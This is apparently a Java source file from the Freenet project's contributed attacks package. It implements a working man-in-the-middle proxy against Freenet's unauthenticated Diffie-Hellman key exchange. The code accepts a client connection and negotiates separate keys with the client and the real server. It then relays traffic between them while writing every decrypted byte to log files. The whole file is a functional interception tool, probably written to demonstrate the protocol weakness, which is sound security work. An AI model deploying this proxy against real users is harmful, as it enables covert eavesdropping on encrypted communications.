package Freenet.contrib.attacks;

import Freenet.crypt.*;
import Freenet.crypt.ciphers.*;
import java.net.*;
import java.io.*;

public class ManInTheMiddle {

    public static void main(String[] args) throws Exception {
	if (args.length<5) {
	    System.err.println("Usage:\njava Freenet.contrib.attacks.ManInTheMiddle "+
			       "<listen> <host> <port> <alice-file> <bob-file>");
	    System.exit(0);
	}

	ServerSocket s=new ServerSocket(Integer.parseInt(args[0]));
	Yarrow rs=new Yarrow();
	DiffieHellman ke=new DiffieHellman(Global.DHgroupA, rs);

	File aliceFile=new File(args[3]);
	File bobFile=new File(args[4]);
	PrintStream aliceLog=new PrintStream(new FileOutputStream(aliceFile));
	PrintStream bobLog=new PrintStream(new FileOutputStream(bobFile));
	
	while (true) {
	    Socket inbound=s.accept();
	    aliceLog.println("\n-------------------------------------\n"+
			     "Mallory: New Alice, negotiating key...");
	    CipherLink c=new CipherLink(rs, ke, new Rijndael(), 
					inbound.getInputStream(),
					inbound.getOutputStream());
	    InputStream aliceIn=c.getInputStream();
	    OutputStream aliceOut=c.getOutputStream();
	    aliceLog.println("Mallory: Alice connected.\n"+
			     "--------------------------------------");

	    Socket outbound=new Socket(args[1], Integer.parseInt(args[2]));
	    bobLog.println("\n-----------------------------------\n"+
			   "Mallory: New Bob, negotiating key...");

	    c=new CipherLink(rs, ke, new Rijndael(), 
			     outbound.getInputStream(),
			     outbound.getOutputStream());
	    InputStream bobIn=c.getInputStream();
	    OutputStream bobOut=c.getOutputStream();
	    bobLog.println("Mallory: Bob connected.\n"+
			   "------------------------------------");

	    new StreamWatch(aliceIn, bobOut, aliceLog, outbound).start();
	    new StreamWatch(bobIn, aliceOut, bobLog, inbound).start();
	}
    }
}

    class StreamWatch extends Thread {
	InputStream in;
	OutputStream out;
	PrintStream log;
	Socket s;

	public StreamWatch(InputStream in, OutputStream out,
			   PrintStream log, Socket s) {
	    this.in=in;
	    this.out=out;
	    this.log=log;
	    this.s = s;
	}

	public void run() {
	    try {
		int rc=0;
		while (rc!=-1) {
		    rc=in.read();
		    if (rc>=0) {
			out.write(rc);
			out.flush();
			log.write(rc);
		    }
		}
	    } catch (IOException e) {
	    } finally {
		// close actual socket - oskar
		try {
		    s.close();
		} catch (IOException e) {
		    log.println(e);
		}
		log.println("Mallory: Lost connection");
	    }
	}
    }








